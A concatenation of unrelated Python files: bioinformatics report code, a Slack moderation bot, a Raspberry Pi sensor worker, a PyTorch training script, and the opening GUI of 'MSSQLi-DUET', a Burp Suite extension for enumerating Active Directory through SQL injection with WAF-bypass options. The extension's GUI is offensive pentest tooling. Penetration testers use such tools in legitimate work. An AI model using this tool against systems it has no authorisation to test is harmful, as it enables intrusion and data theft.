Custom reports for ResFinder analyses. These reports link the gene(s) found to their resistance phenotypes
"""
from spadespipeline.typingclasses import ResistanceNotes
target_dir = str()
for folder in self.targetfolders:
target_dir = folder
genedict, altgenedict = ResistanceNotes.notes(target_dir)
# Create a workbook to store the report. Using xlsxwriter rather than a simple csv format, as I want to be
# able to have appropriately sized, multi-line cells
workbook = xlsxwriter.Workbook(os.path.join(self.reportpath, '{}.xlsx'.format(self.analysistype)))
# New worksheet to store the data
worksheet = workbook.add_worksheet()
# Add a bold format for header cells. Using a monotype font size 10
bold = workbook.add_format({'bold': True, 'font_name': 'Courier New', 'font_size': 8})
# Format for data cells. Monotype, size 10, top vertically justified
courier = workbook.add_format({'font_name': 'Courier New', 'font_size': 8})
courier.set_align('top')
# Initialise the position within the worksheet to be (0,0)
row = 0
col = 0
# A dictionary to store the column widths for every header
columnwidth = dict()
extended = False
headers = ['Strain', 'Gene', 'Allele', 'Resistance', 'PercentIdentity', 'PercentCovered', 'Contig', 'Location',
'nt_sequence']
for sample in self.metadata:
sample[self.analysistype].sampledata = list()
# Process the sample only if the script could find targets
if sample[self.analysistype].blastresults != 'NA' and sample[self.analysistype].blastresults:
for result in sample[self.analysistype].blastresults:
# Set the name to avoid writing out the dictionary[key] multiple times
name = result['subject_id']
# Use the ResistanceNotes gene name extraction method to get the necessary variables
gname, genename, accession, allele = ResistanceNotes.gene_name(name)
# Initialise a list to store all the data for each strain
data = list()
# Determine the name of the gene to use in the report and the resistance using the resistance
# method
finalgene, resistance = ResistanceNotes.resistance(gname, genename, genedict, altgenedict)
# Append the necessary values to the data list
data.append(finalgene)
data.append(allele)
data.append(resistance)
percentid = result['percentidentity']
data.append(percentid)
data.append(result['alignment_fraction'])
data.append(result['query_id'])
data.append('...'.join([str(result['low']), str(result['high'])]))
try:
# Only if the alignment option is selected, for inexact results, add alignments
if self.align and percentid != 100.00:
# Align the protein (and nucleotide) sequences to the reference
self.alignprotein(sample, name)
if not extended:
# Add the appropriate headers
headers.extend(['aa_Identity',
'aa_Alignment',
'aa_SNP_location',
'nt_Alignment',
'nt_SNP_location'
])
extended = True
# Create a FASTA-formatted sequence output of the query sequence
record = SeqRecord(sample[self.analysistype].dnaseq[name],
id='{}_{}'.format(sample.name, name),
description='')
# Add the alignment, and the location of mismatches for both nucleotide and amino
# acid sequences
data.extend([record.format('fasta'),
sample[self.analysistype].aaidentity[name],
sample[self.analysistype].aaalign[name],
sample[self.analysistype].aaindex[name],
sample[self.analysistype].ntalign[name],
sample[self.analysistype].ntindex[name]
])
else:
record = SeqRecord(Seq(result['query_sequence']),
id='{}_{}'.format(sample.name, name),
description='')
data.append(record.format('fasta'))
if self.align:
# Add '-'s for the empty results, as there are no alignments for exact matches
data.extend(['-', '-', '-', '-', '-'])
# If there are no blast results for the target, add a '-'
except (KeyError, TypeError):
data.append('-')
sample[self.analysistype].sampledata.append(data)
if 'nt_sequence' not in headers:
headers.append('nt_sequence')
# Write the header to the spreadsheet
for header in headers:
worksheet.write(row, col, header, bold)
# Set the column width based on the longest header
try:
columnwidth[col] = len(header) if len(header) > columnwidth[col] else columnwidth[
col]
except KeyError:
columnwidth[col] = len(header)
worksheet.set_column(col, col, columnwidth[col])
col += 1
# Increment the row and reset the column to zero in preparation of writing results
row += 1
col = 0
# Write out the data to the spreadsheet
for sample in self.metadata:
if not sample[self.analysistype].sampledata:
worksheet.write(row, col, sample.name, courier)
# Increment the row and reset the column to zero in preparation of writing results
row += 1
col = 0
# Set the width of the row to be the number of lines (number of newline characters) * 12
worksheet.set_row(row)
worksheet.set_column(col, col, columnwidth[col])
for data in sample[self.analysistype].sampledata:
columnwidth[col] = len(sample.name) + 2
worksheet.set_column(col, col, columnwidth[col])
worksheet.write(row, col, sample.name, courier)
col += 1
# List of the number of lines for each result
totallines = list()
for results in data:
#
worksheet.write(row, col, results, courier)
try:
# Counting the length of multi-line strings yields columns that are far too wide, only count
# the length of the string up to the first line break
alignmentcorrect = len(str(results).split('\n')[1])
# Count the number of lines for the data
lines = results.count('\n') if results.count('\n') >= 1 else 1
# Add the number of lines to the list
totallines.append(lines)
except IndexError:
try:
# Counting the length of multi-line strings yields columns that are far too wide, only count
# the length of the string up to the first line break
alignmentcorrect = len(str(results).split('\n')[0])
# Count the number of lines for the data
lines = results.count('\n') if results.count('\n') >= 1 else 1
# Add the number of lines to the list
totallines.append(lines)
# If there are no newline characters, set the width to the length of the string
except AttributeError:
alignmentcorrect = len(str(results))
lines = 1
# Add the number of lines to the list
totallines.append(lines)
# Increase the width of the current column, if necessary
try:
columnwidth[col] = alignmentcorrect if alignmentcorrect > columnwidth[col] else \
columnwidth[col]
except KeyError:
columnwidth[col] = alignmentcorrect
worksheet.set_column(col, col, columnwidth[col])
col += 1
# Set the width of the row to be the number of lines (number of newline characters) * 12
worksheet.set_row(row, max(totallines) * 11)
# Increase the row counter for the next strain's data
row += 1
col = 0
# Close the workbook
workbook.close()
def virulencefinderreporter(self):
with open(os.path.join(self.reportpath, 'virulence.csv'), 'w') as report:
header = 'Strain,Gene,PercentIdentity,PercentCovered,Contig,Location,Sequence\n'
data = ''
for sample in self.metadata:
if sample.general.bestassemblyfile != 'NA':
if sample[self.analysistype].blastresults:
data += '{},'.format(sample.name)
#
multiple = False
for result in sample[self.analysistype].blastresults:
if self.analysistype == 'virulence':
gene = result['subject_id'].split(':')[0]
else:
gene = result['subject_id']
if multiple:
data += ','
data += '{},{},{},{},{}..{},{}\n' \
.format(gene, result['percentidentity'], result['alignment_fraction'],
result['query_id'], result['low'], result['high'], result['query_sequence'])
# data += '\n'
multiple = True
else:
data += '{}\n'.format(sample.name)
else:
data += '{}\n'.format(sample.name)
report.write(header)
report.write(data)
@staticmethod
def interleaveblastresults(query, subject):
"""
Creates an interleaved string that resembles BLAST sequence comparisons
:param query: Query sequence
:param subject: Subject sequence
:return: Properly formatted BLAST-like sequence comparison
"""
# Initialise strings to hold the matches, and the final BLAST-formatted string
matchstring = ''
blaststring = ''
# Iterate through the query
for i, bp in enumerate(query):
# If the current base in the query is identical to the corresponding base in the reference, append a '|'
# to the match string, otherwise, append a ' '
if bp == subject[i]:
matchstring += '|'
else:
matchstring += ' '
# Set a variable to store the progress through the sequence
prev = 0
# Iterate through the query, from start to finish in steps of 60 bp
for j in range(0, len(query), 60):
# BLAST results string. The components are: current position (padded to four characters), 'OLC', query
# sequence, \n, matches, \n, 'ref', subject sequence. Repeated until all the sequence data are present.
"""
0000 OLC ATGAAGAAGATATTTGTAGCGGCTTTATTTGCTTTTGTTTCTGTTAATGCAATGGCAGCT
||||||||||| ||| | |||| ||||||||| || ||||||||||||||||||||||||
ref ATGAAGAAGATGTTTATGGCGGTTTTATTTGCATTAGTTTCTGTTAATGCAATGGCAGCT
0060 OLC GATTGTGCAAAAGGTAAAATTGAGTTCTCTAAGTATAATGAGAATGATACATTCACAGTA
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
ref GATTGTGCAAAAGGTAAAATTGAGTTCTCTAAGTATAATGAGAATGATACATTCACAGTA
"""
blaststring += '{} OLC {}\n {}\n ref {}\n' \
.format('{:04d}'.format(j), query[prev:j + 60], matchstring[prev:j + 60], subject[prev:j + 60])
# Update the progress variable
prev = j + 60
# Return the properly formatted string
return blaststring
def __init__(self, inputobject):
super().__init__(inputobject)
print(vars(self))
# Fields used for custom outfmt 6 BLAST output:
self.fieldnames = ['query_id', 'subject_id', 'positives', 'mismatches', 'gaps',
'evalue', 'bit_score', 'subject_length', 'alignment_length',
'query_start', 'query_end', 'query_frame', 'query_sequence',
'subject_start', 'subject_end', 'subject_frame', 'subject_sequence']
self.geneseekr()
def sequencenames(contigsfile):
"""
Takes a multifasta file and returns a list of sequence names
:param contigsfile: multifasta of all sequences
:return: list of all sequence names
"""
sequences = list()
for record in SeqIO.parse(open(contigsfile, "rU", encoding="iso-8859-15"), "fasta"):
sequences.append(record.id)
return sequences
if __name__ == '__main__':
class Parser(object):
def strainer(self):
# Get the sequences in the sequences folder into a list. Note that they must have a file extension that
# begins with .fa
self.strains = sorted(glob(os.path.join(self.sequencepath, '*.fa*'.format(self.sequencepath))))
self.targets = sorted(glob(os.path.join(self.targetpath, '*.tfa')))
try:
self.combinedtargets = glob(os.path.join(self.targetpath, '*.fasta'))[0]
except IndexError:
combinetargets(self.targets, self.targetpath)
self.combinedtargets = glob(os.path.join(self.targetpath, '*.fasta'))[0]
# Populate the metadata object. This object will be populated to mirror the objects created in the
# genome assembly pipeline. This way this script will be able to be used as a stand-alone, or as part
# of a pipeline
assert self.strains, 'Could not find any files with an extension starting with "fa" in {}. Please check' \
'to ensure that your sequence path is correct'.format(self.sequencepath)
assert self.targets, 'Could not find any files with an extension starting with "fa" in {}. Please check' \
'to ensure that your target path is correct'.format(self.targetpath)
for sample in self.strains:
# Create the object
metadata = MetadataObject()
# Set the base file name of the sequence. Just remove the file extension
filename = os.path.splitext(os.path.split(sample)[1])[0]
# Set the .name attribute to be the file name
metadata.name = filename
# Create the .general attribute
metadata.general = GenObject()
# Create the .mlst attribute
setattr(metadata, self.analysistype, GenObject())
# Set the .general.bestassembly file to be the name and path of the sequence file
metadata.general.bestassemblyfile = sample
metadata[self.analysistype].targets = self.targets
metadata[self.analysistype].combinedtargets = self.combinedtargets
metadata[self.analysistype].targetpath = self.targetpath
metadata[self.analysistype].targetnames = sequencenames(self.combinedtargets)
metadata[self.analysistype].reportdir = self.reportpath
# Append the metadata for each sample to the list of samples
self.samples.append(metadata)
def __init__(self):
from argparse import ArgumentParser
parser = ArgumentParser(description='Use to find markers for any bacterial genome')
parser.add_argument('--version',
action='version',
version='%(prog)s v0.5')
parser.add_argument('-s', '--sequencepath',
required=True,
help='Specify input fasta folder')
parser.add_argument('-t', '--targetpath',
required=True,
help='Specify folder of targets')
parser.add_argument('-r', '--reportpath',
required=True,
help='Specify output folder for csv')
parser.add_argument('-c', '--cutoff',
type=int,
default=70, help='Threshold for maximum unique bacteria for a single antibiotic')
parser.add_argument('-n', '--numthreads',
type=int,
default=24,
help='Specify number of threads')
parser.add_argument('-a', '--align',
action='store_true',
help='Optionally output alignments of genes with less than 100% identity to reference '
'genes. This alignment will use amino acid sequences for both query and reference')
parser.add_argument('-u', '--unique',
action='store_true',
help='Do not report multiple hits at the same location in a contig. Instead, store the'
'best hit, and ignore the rest')
parser.add_argument('-R', '--resfinder',
action='store_true',
help='Perform ResFinder-like analyses ')
parser.add_argument('-v', '--virulencefinder',
action='store_true',
help='Perform VirulenceFinder-like analyses')
args = parser.parse_args()
self.sequencepath = os.path.join(args.sequencepath)
assert os.path.isdir(self.sequencepath), 'Cannot locate sequence path as specified: {}'\
.format(self.sequencepath)
self.targetpath = os.path.join(args.targetpath)
assert os.path.isdir(self.targetpath), 'Cannot locate target path as specified: {}'\
.format(self.targetpath)
self.reportpath = os.path.join(args.reportpath)
make_path(self.reportpath)
assert os.path.isdir(self.reportpath), 'Cannot locate report path as specified: {}'\
.format(self.reportpath)
self.cutoff = args.cutoff
self.threads = args.numthreads
self.align = args.align
self.unique = args.unique
self.resfinder = args.resfinder
self.virulencefinder = args.virulencefinder
self.strains = list()
self.targets = list()
self.combinedtargets = str()
self.samples = list()
self.logfile = os.path.join(self.sequencepath, 'log.txt')
if self.resfinder:
self.analysistype = 'resfinder'
elif self.virulencefinder:
self.analysistype = 'virulence'
elif self.resfinder and self.virulencefinder:
printtime('Cannot perform ResFinder and VirulenceFinder simultaneously. Please choose only one '
'of the -R and -v flags', self.start)
else:
self.analysistype = 'geneseekr'
self.start = time.time()
self.strainer()
class MetadataInit(object):
def __init__(self):
# Run the parser
self.runmetadata = Parser()
# Get the appropriate variables from the metadata file
self.start = self.runmetadata.start
self.analysistype = self.runmetadata.analysistype
self.cutoff = self.runmetadata.cutoff
self.threads = int(self.runmetadata.threads)
self.reportdir = self.runmetadata.reportpath
self.pipeline = False
self.referencefilepath = str()
self.align = self.runmetadata.align
self.unique = self.runmetadata.unique
self.logfile = self.runmetadata.logfile
# Run the analyses
GeneSeekr_tblastx(self)
# Run the class
MetadataInit()
class PipelineInit(object):
def strainer(self):
for sample in self.runmetadata.samples:
if sample.general.bestassemblyfile != 'NA':
setattr(sample, self.analysistype, GenObject())
if self.genusspecific:
try:
genus = sample.general.closestrefseqgenus
except AttributeError:
genus = sample.general.referencegenus
# Allow Shigella to use the same targets as Escherichia
genus = genus if genus != 'Shigella' else 'Escherichia'
targetpath = os.path.join(self.referencefilepath, self.analysistype, genus)
else:
targetpath = os.path.join(self.referencefilepath, self.analysistype)
targets = glob(os.path.join(targetpath, '*.tfa'))
targetcheck = glob(os.path.join(targetpath, '*.tfa'))
if targetcheck:
try:
combinedtargets = glob(os.path.join(targetpath, '*.fasta'))[0]
except IndexError:
combinetargets(targets, targetpath)
combinedtargets = glob(os.path.join(targetpath, '*.fasta'))[0]
sample[self.analysistype].targets = targets
sample[self.analysistype].combinedtargets = combinedtargets
sample[self.analysistype].targetpath = targetpath
sample[self.analysistype].targetnames = sequencenames(combinedtargets)
sample[self.analysistype].reportdir = os.path.join(sample.general.outputdirectory,
self.analysistype)
else:
# Set the metadata file appropriately
sample[self.analysistype].targets = 'NA'
sample[self.analysistype].combinedtargets = 'NA'
sample[self.analysistype].targetpath = 'NA'
sample[self.analysistype].targetnames = 'NA'
sample[self.analysistype].reportdir = 'NA'
sample[self.analysistype].blastresults = 'NA'
else:
# Set the metadata file appropriately
setattr(sample, self.analysistype, GenObject())
sample[self.analysistype].targets = 'NA'
sample[self.analysistype].combinedtargets = 'NA'
sample[self.analysistype].targetpath = 'NA'
sample[self.analysistype].targetnames = 'NA'
sample[self.analysistype].reportdir = 'NA'
sample[self.analysistype].blastresults = 'NA'
def __init__(self, inputobject, analysistype, genusspecific, cutoff, unique):
self.runmetadata = inputobject.runmetadata
self.analysistype = analysistype
self.path = inputobject.path
self.start = inputobject.starttime
self.referencefilepath = inputobject.reffilepath
self.threads = inputobject.cpus
self.reportdir = inputobject.reportpath
self.cutoff = cutoff
self.logfile = inputobject.logfile
self.pipeline = True
self.genusspecific = genusspecific
self.align = False
self.unique = unique
# Get the alleles and profile into the metadata
self.strainer()
|
utils.py
|
import logging
from threading import Thread
from django.utils import timezone
from slacker import Slacker
from slacksocket import SlackSocket
def background(function):
def decorator(*args, **kwargs):
t = Thread(target=function, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return decorator
class SlackLog(object):
# TODO: change to RTM
logger = logging.getLogger('robozebra.SlackLog')
def log(self, level, msg):
try:
slack = Slacker('zzz') # zlatokopka
slack.chat.post_message('#syslog', '[{}] {}: {}'.format(timezone.now(), level, msg))
except Exception as ex:
self.logger.error('Error logging to Slack: {}. Original message: {}'.format(ex, msg))
def info(self, msg):
self.log('INFO', msg)
def error(self, msg):
self.log('ERROR', msg)
def debil(self, channel, user):
try:
slack = Slacker('zzz') # zlatokopka
slack.chat.post_message('#debilog', '[{}] {}'.format(channel, user))
except:
pass
class SlackCleaner(object):
logger = logging.getLogger('robozebra.SlackCleaner')
slack_logger = SlackLog()
socket = None
def __init__(self, token):
self.socket = SlackSocket(token, translate=True)
@background
def listen(self):
try:
# self.logger('Listening for Slack events...') # TODO: ask why am I getting "'Logger' object is not callable"
for event in self.socket.events():
if not 'type' in event.event or not 'channel' in event.event or not 'user' in event.event:
continue
if not event.event['channel'].startswith('zonky-') or event.event['user'] == 'zlatokopka':
continue
if 'subtype' in event.event and (event.event['subtype'] == 'channel_join'
or event.event['subtype'] == 'channel_leave'):
continue
if event.event['type'] == 'user_typing':
self.warn_user(event.event['user'])
if event.event['type'] == 'message':
self.logger.warn(
'Debil: channel: {}, user: {}; event: {}'.format(event.event['channel'], event.event['user'],
event.event))
self.slack_logger.debil(event.event['channel'], event.event['user'])
except Exception as ex:
self.logger.error('Error while listening to Slack: {}'.format(ex))
self.slack_logger.error('Listening loop probably down! {}'.format(ex))
def warn_user(self, username):
try:
im = self.socket.get_im_channel(user_name=username)
self.socket.send_msg(
"Prosim nepis nic do kanalu 'zonky-X' at nespoustis plane notifikace. Kanaly 'zonky-X' jsou urceny jen pro notifikace o novych pujckach.",
channel_id=im['id'], confirm=False)
except Exception as ex:
self.logger.error('Error warning user via Slack: {}'.format(ex))
def delete_message(self, channel, ts):
# http://stackoverflow.com/questions/37923772/cannot-delete-a-chat-message-via-slack-api
pass
|
pi_sensor_worker.py
|
import time
import datetime
import json
import redis
import threading
import sys
sys.path.append('..')
from sensors.pi.float_sensor import (FloatSensor)
from sensors.pi.humidity_sensor import (HumiditySensor)
from sensors.pi.temperature_sensor import (TemperatureSensor)
from sensors.pi.soil_sensor import (SoilSensor)
import variables
#r = redis.Redis(host='127.0.0.1', port=6379)
# def clamp(n, smallest, largest): return max(smallest, min(n, largest))
class PiSensorWorker():
def __init__(self, config, main_thread_running, system_ready):
#self.config = {**config, **self.config}
self.config = config
self.channel = config.get('channel', 'sensors').replace(" ", "_").lower()
self.sleep_duration = config.get('sleep_duration', 30)
self.main_thread_running = main_thread_running
self.system_ready = system_ready
#Store pump event so we can shutdown pump with float readings
self.sensors = []
self.init_sensors()
return
def dynamic_import(self, name):
#Split path of the class folder structure: {sensor name}_sensor . {SensorName}Sensor
components = name.split('.')
#Dynamically import root of component path
module = __import__(components[0])
#Get component attributes
for component in components[1:]:
module = getattr(module, component)
return module
def init_sensors(self):
for sensor in self.config['sensors']:
if sensor.get('type', None) is not None:
#Get the sensor from the sensors folder\
# {sensor name}_sensor.{SensorName}Sensor
sensor_type = 'sensors.pi.' + sensor.get('type').lower() +\
'_sensor.' + sensor.get('type').capitalize() + 'Sensor'
imported_sensor = self.dynamic_import(sensor_type)
# Define default kwargs for all sensor types, conditionally include optional variables below if they exist
sensor_kwargs = {
'name' : sensor.get('name', sensor.get('type')),
'pin' : int(sensor.get('pin')),
'key' : sensor.get('key', None)
}
# optional sensor variables
# Model is specific to DHT modules to specify DHT11 DHT22 or DHT2302
if sensor.get('model'):
sensor_kwargs['model'] = sensor.get('model')
new_sensor = imported_sensor(**sensor_kwargs)
new_sensor.init_sensor()
#Set the sensor type and determine if the readings are critical to operations
new_sensor.type = sensor.get('type').lower()
if sensor.get('critical', None) is not None:
new_sensor.critical = True
else:
new_sensor.critical = False
self.sensors.append(new_sensor)
print('{type} Sensor (Pi) {pin}...\t\t\033[1;32m Ready\033[0;0m'.format(**sensor))
return
def run(self):
t = threading.Thread(target=self.work, args=())
t.start()
#TODO: This is printing 2 sensors when only 1 attached.
print('Pi Sensor Worker [' + str(len(self.config)) + ' Sensors]...\t\t\033[1;32m Running\033[0;0m')
return t
def work(self):
while self.main_thread_running.is_set():
if self.system_ready.is_set():
message = {'event':'PiSensorUpdate'}
readings = {}
for sensor in self.sensors:
#breakpoint()
result = sensor.read()
readings[sensor.key] = result
variables.r.set(sensor.key, json.dumps(result))
#print(sensor.name, result)
#Check for a critical water level from any float sensors
if sensor.type == 'float':
if sensor.critical:
if result:
pass
#self.pump_ready.set()
else:
pass
#self.pump_ready.clear()
#print(readings)
message['data'] = readings
variables.r.publish(self.channel, json.dumps(message))
time.sleep(self.sleep_duration)
time.sleep(2)
#This is only ran after the main thread is shut down
print("Pi Sensor Worker Shutting Down...\t\033[1;32m Complete\033[0;0m")
|
train.py
|
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import time
import multiprocessing as mp
from torch.autograd import Variable
from utils import *
def LC_Train(lower_network, upper_network, local_network, train_loader, test_loader, args, device):
optimizer_1 = torch.optim.Adam(lower_network.parameters(), lr=args.lr)
optimizer_2 = torch.optim.Adam(upper_network.parameters(), lr=args.lr)
optimizer_LC = torch.optim.Adam(local_network.parameters(), lr=args.lr)
shm_lists = []
shm_target = SharedTensor([args.batch_size,], dtype='int32')
shm_lists.append(shm_target) # [0]
shm_lists.append(shm_target) # [1]
test_inputs = torch.FloatTensor(1, args.image_dim, args.image_size, args.image_size) # for CIFAR10, for MNIST (1,1,28,28)
shape = compute_shapes(lower_network, test_inputs, args)
shm_data = SharedTensor(shape)
shm_lists.append(shm_data) # [2]
shm_lists.append(shm_data) # [3]
shm_loss = SharedTensor([args.batch_size, ], dtype='float32')
shm_lists.append(shm_loss) # [4]
shm_lists.append(shm_data) # [5]
queue_lists =[]
for _ in range(0,5):
queue_lists.append(mp.Queue())
print(' Epoch Train_Acc(%) Train_Loss Test_Acc(%) Test_Loss Training_time(s)')
processes = []
p = mp.Process(target=train_lower, args=(train_loader, test_loader, lower_network, optimizer_1, shm_lists, args, queue_lists, device))
p.start()
processes.append(p)
p = mp.Process(target=train_upper, args=(train_loader, test_loader, upper_network, optimizer_2, shm_lists, args, queue_lists, device))
p.start()
processes.append(p)
p = mp.Process(target=train_local, args=(train_loader, test_loader, local_network, optimizer_LC, shm_lists, args, queue_lists, device))
p.start()
processes.append(p)
for p in processes:
p.join()
def train_lower(train_loader, test_loader, model, optimizer, shm_lists, args, queue_lists, device):
model.to(device)
for epoch in range(args.epochs):
model.train()
for i, (inputs, target) in enumerate(train_loader):
while len(inputs) != args.batch_size:
inputs_copy_len = (args.batch_size - len(inputs)) if (args.batch_size - len(inputs) <= len(inputs)) else len(inputs)
inputs = torch.cat([inputs, inputs[0:inputs_copy_len]], 0)
target = torch.cat([target, target[0:inputs_copy_len]], 0)
time.sleep(args.time_sleep_iteration)
# send target to the last processor
inputs = inputs.to(device)
output = model.forward(inputs)
shm_lists[0].send(target)
shm_lists[1].send(target)
shm_lists[2].send(output.data)
shm_lists[3].send(output.data)
queue_lists[1].put(1)
queue_lists[2].put(1)
optimizer.zero_grad()
queue_lists[4].get()
grad = shm_lists[5].recv()
grad = grad.to(device)
output.backward(grad)
optimizer.step()
model.eval()
for i, (inputs, target) in enumerate(test_loader):
while len(inputs) != args.batch_size:
inputs_copy_len = (args.batch_size - len(inputs)) if (args.batch_size - len(inputs) <= len(inputs)) else len(inputs)
inputs = torch.cat([inputs, inputs[0:inputs_copy_len]], 0)
target = torch.cat([target, target[0:inputs_copy_len]], 0)
time.sleep(args.time_sleep_iteration)
# send target to the last processor
inputs = inputs.to(device)
output = model.forward(inputs)
shm_lists[0].send(target)
shm_lists[1].send(target)
shm_lists[2].send(output.data)
shm_lists[3].send(output.data)
queue_lists[1].put(1)
queue_lists[2].put(1)
queue_lists[3].get()
queue_lists[4].get()
def train_upper(train_loader, test_loader, model, optimizer, shm_lists, args, queue_lists, device):
model.to(device)
criterion1 = nn.CrossEntropyLoss(reduction='none')
criterion2 = nn.CrossEntropyLoss()
for epoch in range(args.epochs):
model.train()
start_time = time.time()
train_losses = AverageMeter()
train_acc = AverageMeter()
test_losses = AverageMeter()
test_acc = AverageMeter()
for i in range(len(train_loader)):
time.sleep(args.time_sleep_iteration)
queue_lists[1].get()
target = shm_lists[0].recv()
target = target.to(device)
inputs = shm_lists[2].recv()
inputs = inputs.to(device)
target_var = Variable(target)
inputs_var = Variable(inputs, requires_grad=True)
output = model(inputs_var)
loss1 = criterion1(output, target_var)
loss = criterion2(output, target_var)
shm_lists[4].send(loss1.data)
queue_lists[3].put(1)
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
train_losses.update(loss.data, target.size(0))
train_acc.update(prec1, target.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
training_time = time.time()-start_time
for i in range(len(test_loader)):
time.sleep(args.time_sleep_iteration)
queue_lists[1].get()
target = shm_lists[0].recv()
inputs = shm_lists[2].recv()
target = target.to(device)
inputs = inputs.to(device)
output = model(inputs)
loss = criterion2(output, target)
queue_lists[3].put(1)
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
test_losses.update(loss.data, target.size(0))
test_acc.update(prec1, target.size(0))
print('Main Network ','{epoch:d} {acc.avg:.3f} {losses.avg:.3f} {test_acc.avg:.3f} {test_losses.avg:.3f} {time:.3f} \n'.format(epoch=epoch, acc=train_acc, losses=train_losses, test_acc=test_acc, test_losses=test_losses, time=training_time), end=' ',flush=True)
def train_local(train_loader, test_loader, model, optimizer, shm_lists, args, queue_lists, device):
model.to(device)
criterion1 = nn.CrossEntropyLoss(reduction='none')
criterion2 = nn.CrossEntropyLoss()
criterion_mse = nn.MSELoss()
for epoch in range(args.epochs):
model.train()
start_time = time.time()
train_losses = AverageMeter()
train_acc = AverageMeter()
test_losses = AverageMeter()
test_acc = AverageMeter()
for i in range(len(train_loader)):
time.sleep(args.time_sleep_iteration)
queue_lists[2].get()
target = shm_lists[1].recv()
inputs = shm_lists[3].recv()
inputs = inputs.to(device)
target = target.to(device)
target_var = Variable(target)
inputs_var = Variable(inputs, requires_grad=True)
output = model(inputs_var)
loss = criterion2(output, target_var)
loss.backward(retain_graph=True)
shm_lists[5].send(inputs_var.grad.data)
queue_lists[4].put(1)
queue_lists[3].get()
loss_true = shm_lists[4].recv()
loss_true = loss_true.to(device)
loss_l = criterion1(output, target_var)
loss_lc = criterion_mse(loss_l, loss_true)
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
train_losses.update(loss.data, target.size(0))
train_acc.update(prec1, target.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss_lc.backward(retain_graph=True)
optimizer.step()
training_time = time.time()-start_time
for i in range(len(test_loader)):
time.sleep(args.time_sleep_iteration)
queue_lists[2].get()
target = shm_lists[1].recv()
inputs = shm_lists[3].recv()
inputs = inputs.to(device)
target = target.to(device)
output = model(inputs)
loss = criterion2(output, target)
queue_lists[4].put(1)
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
test_losses.update(loss.data, target.size(0))
test_acc.update(prec1, target.size(0))
print('Local Network ','{epoch:d} {acc.avg:.3f} {losses.avg:.3f} {test_acc.avg:.3f} {test_losses.avg:.3f} {time:.3f} \n'.format(epoch=epoch, acc=train_acc, losses=train_losses, test_acc=test_acc, test_losses=test_losses, time=training_time), end=' ',flush=True)
|
mssqli-duet-plugin.py
|
#Import Burp Objects
from burp import IBurpExtender, IBurpExtenderCallbacks, ITab, IContextMenuFactory, IMessageEditorTab, IMessageEditorController, IHttpRequestResponse
#Import Java GUI Objects
from java.awt import Dimension, FlowLayout, Color, Toolkit
from java.awt.datatransfer import Clipboard, StringSelection
from javax import swing
from thread import start_new_thread
from java.util import ArrayList
import sys, time, threading, base64, re
from java.io import PrintWriter
import urllib
import struct
import json
try:
from exceptions_fix import FixBurpExceptions
except ImportError:
pass
class BurpExtender (IBurpExtender, ITab, IBurpExtenderCallbacks, IContextMenuFactory, IMessageEditorTab, IMessageEditorController, IHttpRequestResponse):
# Extention information
EXT_NAME = "MSSQLi-DUET"
EXT_DESC = "Enumerate Active Directory users, groups, and machines via SQL injection."
EXT_AUTHOR = "Devin Casadey (Keramas)"
# Output info to the Extensions console and register Burp API functions
def registerExtenderCallbacks(self, callbacks):
print "Name: \t\t" + BurpExtender.EXT_NAME
print "Description: \t" + BurpExtender.EXT_DESC
print "Authors: \t" + BurpExtender.EXT_AUTHOR
# Required for easier debugging:
# https://github.com/securityMB/burp-exceptions
sys.stdout = callbacks.getStdout()
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.setExtensionName(BurpExtender.EXT_NAME)
stdout = PrintWriter(callbacks.getStdout(), True)
callbacks.registerContextMenuFactory(self)
self.httpTraffic = None
self.resp = None
#Create panels used for layout; we must stack and layer to get the desired GUI
self.tab = swing.Box(swing.BoxLayout.Y_AXIS)
self.tabbedPane = swing.JTabbedPane()
self.tab.add(self.tabbedPane)
# First tab
self.duetTab = swing.Box(swing.BoxLayout.Y_AXIS)
self.tabbedPane.addTab("MSSQLi-DUET", self.duetTab)
# Create objects for the first tab's GUI
# These rows will add top to bottom on the Y Axis
self.t1r1 = swing.JPanel(FlowLayout())
self.t1r2 = swing.JPanel(FlowLayout())
self.t1r3 = swing.JPanel(FlowLayout())
self.t1r4 = swing.JPanel(FlowLayout())
self.t1r5 = swing.JPanel(FlowLayout())
self.t1r6 = swing.JPanel(FlowLayout())
self.t1r7 = swing.JPanel(FlowLayout())
# Now add content to the first tab's GUI objects
self.encodingBox = swing.JComboBox(["None","unicode","unicode_unescaped","doubleencode","unmagicquotes"])
self.delayBox = swing.JTextField("0",3)
self.ridMinBox = swing.JTextField("1000",5)
self.ridMaxBox = swing.JTextField("1500",5)
self.paramBox = swing.JTextField("",15)
self.injectBox = swing.JTextField("",15)
self.outputTxt = swing.JTextArea(10,50)
self.outputScroll = swing.JScrollPane(self.outputTxt)
self.requestTxt = swing.JTextArea(10,50)
self.requestScroll = swing.JScrollPane(self.requestTxt)
self.requestTxt.setLineWrap(True)
self.outputTxt.setBackground(Color.lightGray)
self.outputTxt.setEditable(False)
self.outputTxt.setLineWrap(True)
self.t1r1.add(swing.JLabel("<html><center><h2>MSSQLi-DUET</h2>Enumerate Active Directory users, groups, and machines via SQL injection.</center></html>"))
#Add labels here for all of the args needed.
self.t1r2.add(swing.JLabel("WAF Bypass Method:"))
self.t1r2.add(self.encodingBox)
#Minimum RID value
self.t1r2.add(swing.JLabel("Minimum RID value:"))
self.t1r2.add(self.ridMinBox)
#Maximum RID value
self.t1r2.add(swing.JLabel("Maximum RID value:"))
self.t1r2.add(self.ridMaxBox)
#Delay for requests
self.t1r2.add(swing.JLabel("Delay:"))
self.t1r2.add(self.delayBox)
#Vulnerable parameter
self.t1r3.add(swing.JLabel("Vulnerable Parameter:"))
self.t1r3.add(self.paramBox)
#Injection starting point
self.t1r3.add(swing.JLabel("Injection start:"))
self.t1r3.add(self.injectBox)
#Request section
self.t1r4.add(swing.JLabel("Raw request:"))
self.t1r4.add(self.requestScroll)
self.t1r5.add(swing.JButton("Run", actionPerformed=self.executePayload))
self.t1r5.add(swing.JButton("Clear", actionPerformed=self.clearRequest))
